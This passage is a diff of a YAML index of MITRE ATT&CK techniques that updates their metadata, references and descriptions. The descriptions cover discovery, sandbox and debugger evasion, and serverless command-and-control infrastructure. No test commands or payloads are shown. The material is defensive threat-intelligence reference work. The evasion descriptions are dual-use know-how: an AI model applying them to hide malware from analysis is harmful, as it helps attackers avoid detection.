+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -51069,46 +51760,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -51132,6 +51788,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -51142,9 +51801,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -51154,12 +51818,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -51202,12 +51893,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51218,28 +51908,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -51272,9 +51965,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests:
     - name: Examine AWS Password Policy
@@ -51342,7 +52034,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -51381,13 +52073,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -51428,87 +52118,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -51561,17 +52249,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -51579,10 +52266,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51591,15 +52280,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -51627,9 +52317,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -51704,7 +52391,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests: []
   T1046:
@@ -51776,7 +52462,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests: []
   T1518:
@@ -51825,12 +52510,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests: []
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51851,12 +52535,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -51881,7 +52564,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -51936,7 +52618,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -51956,7 +52638,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1124:
@@ -52059,13 +52740,12 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests: []
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52076,7 +52756,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52147,29 +52827,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -52193,15 +52872,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
